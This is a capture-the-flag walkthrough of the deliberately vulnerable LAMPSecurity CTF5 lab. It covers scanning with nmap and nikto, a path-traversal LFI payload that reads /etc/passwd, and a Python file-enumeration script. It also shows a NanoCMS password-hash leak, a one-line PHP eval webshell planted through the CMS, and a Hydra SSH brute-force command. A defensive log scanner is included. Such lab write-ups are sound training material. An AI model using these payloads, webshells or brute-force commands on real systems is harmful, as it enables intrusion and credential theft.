Hack the LAMPSecurity: CTF 5 (CTF Challenge)
Hello, friends! Today we will face another CTF challenge called LAMPSecurity CTF5, another boot2root challenge provided for practice, with a security level suited to beginners. So let's try to break into it. Note that you can download it first from here: https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
Once it's downloaded, let's start today's challenge!
Hands-on walkthrough
Environment
Kali IP: 192.168.35.128
Host discovery
First, use the netdiscover command to find the target machine's IP.
netdiscover -i eth0 -r 192.168.35.0/24
The target host is found at: 192.168.35.148
Information gathering
With the target IP known, run an nmap scan to gather information.
nmap -O -sV -T4 -p 0-65535 192.168.35.148
The target has ports 80 and 22 open.
Let's visit the website first, then scan it with nikto.
nikto -host http://192.168.35.148 -port 80
---------------------------------------------------------------------------
+ Target IP: 192.168.35.148
+ Target Hostname: 192.168.35.148
+ Target Port: 80
+ Start Time: 2020-12-04 20:23:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 558008, size: 22676, mtime: Tue Aug 21 10:59:12 2029
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8724 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time: 2020-12-04 20:23:57 (GMT8) (45 seconds)
Attempting an attack
As we can see, the target looks vulnerable to LFI/RFI.
Now we paste the following payload into the URL and exploit the LFI vulnerability from the browser:
http://192.168.35.148/index.php?page=../../../../etc/passwd%00
A file inclusion vulnerability does indeed exist, and /etc/passwd is read out successfully.
Viewing the page source here makes the output easier to read.
Five users are found: patrick, jennifer, andy, loren and amy.
These users may come in handy later.
Since there is an inclusion vulnerability, we can write a small Python script to quickly enumerate files on the system.
import requests

# Each candidate path from test.txt is substituted for NAME; the trailing %00
# truncates the path PHP appends after the include parameter
URL = "http://192.168.35.148/index.php?page=../../../../../../NAME%00"

# test.txt holds one candidate file path per line (e.g. home/amy/.ssh/id_rsa)
with open("test.txt") as fd:
    for word in fd:
        word = word.strip()
        if not word:
            continue
        r = requests.get(URL.replace("NAME", word))
        # PHP prints "failed to open stream" when the included file does not exist or is unreadable
        if "failed to open stream" not in r.text:
            print("found", word)
Obviously, test.txt first needs to be filled with interesting file paths (for example, a user's .ssh/id_rsa).
We get the following output:
Not very interesting though: we managed to access .bashrc but not the SSH keys. The Apache logs are also inaccessible.
The file inclusion vulnerability probably can't be pushed any further, so we need to look for another way in.
On the website we find that Andy Carp's Blog is powered by NanoCMS, a lightweight PHP-based CMS that is now discontinued. So we searched online for possible vulnerabilities related to NanoCMS and found the details at the following URL: https://cxsecurity.com/issue/WLB-2009040041
The identified vulnerability is a "password hash information disclosure", which allows unrestricted access to the path /data/pagesdata.txt
Try appending the path directly to the URL.
The password comes straight out; although it is stored as a hash, cracking it reveals the plaintext.
And just like that we happily get the credentials:
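From the defender's side, the requests above leave a very recognisable trace in the Apache access log. The following is an added example (not part of the original write-up): a small Python scanner that parses constructed combined-format log lines and flags the `page=` parameter when it carries traversal sequences, the `%00` null-byte truncation used above, sensitive target paths, or a remote/wrapper include. The sample log lines and the indicator list are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format); not real captures.
SAMPLE_LOG = """\
192.168.35.128 - - [04/Dec/2020:20:30:01 +0800] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.35.128 - - [04/Dec/2020:20:30:05 +0800] "GET /index.php?page=../../../../../../home/amy/.ssh/id_rsa%00 HTTP/1.1" 200 512 "-" "python-requests/2.25"
192.168.35.128 - - [04/Dec/2020:20:30:06 +0800] "GET /index.php?page=%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 400 "-" "curl/7.72"
10.0.0.5 - - [04/Dec/2020:20:31:00 +0800] "GET /index.php?page=contact HTTP/1.1" 200 1870 "-" "Mozilla/5.0"
10.0.0.6 - - [04/Dec/2020:20:31:10 +0800] "GET /~andy/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def lfi_indicators(target):
    """Return the reasons a request target looks like a file-inclusion attempt ([] if clean)."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        if "../" in decoded or "..\\" in decoded:
            reasons.append(f"{name}: directory traversal")
        if "\x00" in decoded:
            reasons.append(f"{name}: null byte (path truncation on old PHP)")
        if re.search(r"(^|/)(etc/(passwd|shadow)|\.ssh/|proc/self)", decoded):
            reasons.append(f"{name}: sensitive path")
        if re.match(r"(https?|ftp|php|data):", decoded, re.I):
            reasons.append(f"{name}: remote or wrapper include")
    return reasons

def scan_access_log(text):
    """Return (ip, target, status, reasons) for every log line carrying LFI indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = lfi_indicators(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], m["status"], reasons))
    return hits

if __name__ == "__main__":
    for ip, target, status, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, status, target, "|", "; ".join(reasons))
```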
Username: admin
Password: shannon
Backend login
Log in here with the credentials above.
We enter the admin backend and find that the "new page" screen lets us write content.
First, write a small piece of code to test.
We can simply run commands via /~andy/data/pages/pwned.php?cmd=ls.
So we can write the classic one-line PHP backdoor directly:
<?php
@eval($_POST['cmd']);
?>
Connect with AntSword and obtain the webshell.
Onwards!
Here we can see that the Linux kernel version is 2.6.23.1-42; one could search for privilege escalation exploits for this kernel version, but I did not use the kernel for privilege escalation here.
Also, using the 5 users found above, we can brute-force SSH with Hydra.
amy's password is cracked successfully.
hydra -L user.txt -P rockyou.txt 192.168.35.148 ssh -vV -f
Successfully logged in as amy.
Privilege escalation
Find the mail directory; apart from her own mail, nothing else is accessible.
In amy's mail we find this:
From apache@localhost.localdomain Wed Apr 29 13:00:34 2009
Return-Path: <apache@localhost.localdomain>
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
by localhost.localdomain (8.14.1/8.14.1) with ESMTP id n3TH0Yqh007374
for <amy@localhost.localdomain>; Wed, 29 Apr 2009 13:00:34 -0400
Received: (from apache@localhost)
by localhost.localdomain (8.14.1/8.14.1/Submit) id n3TH0Yv7007373;
Wed, 29 Apr 2009 13:00:34 -0400
Date: Wed, 29 Apr 2009 13:00:34 -0400
Message-Id: <200904291700.n3TH0Yv7007373@localhost.localdomain>
To: amy@localhost.localdomain
Subject: An administrator created an account for you at Phake Organization Event Manager
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8Bit
X-Mailer: Drupal
Errors-To: patrick@localhost.localdomain
Sender: patrick@localhost.localdomain
Reply-To: patrick@localhost.localdomain
From: patrick@localhost.localdomain
amy,
A site administrator at Phake Organization Event Manager has created an account for you. You may now log in to http://192.168.229.129/events/?q=user using the following username and password:
username: amy
password: temppass
You may also log in by clicking on this link or copying and pasting it in your browser:
http://192.168.229.129/events/?q=user/reset/5/1241024434/68f9e4a85f2fad39d3140101bcc3865a
This is a one-time login, so it can be used only once.
After logging in, you will be redirected to http://192.168.229.129/events/?q=user/5/edit so you can change your password.
-- Phake Organization Event Manager team
From this email we learn that Patrick is the administrator. We'll search his home directory in detail.
But on the first pass, nothing of value was found.
Only later did it occur to me to check whether there were hidden files.
Sure enough,
in the hidden directory .tomboy we find a note, 481bca0d-7206-45dd-a459-a72ea1131329.note
481bca0d-7206-45dd-a459-a72ea1131329.note
Astonishing: just like that, the root password is right there.
And that's it, done!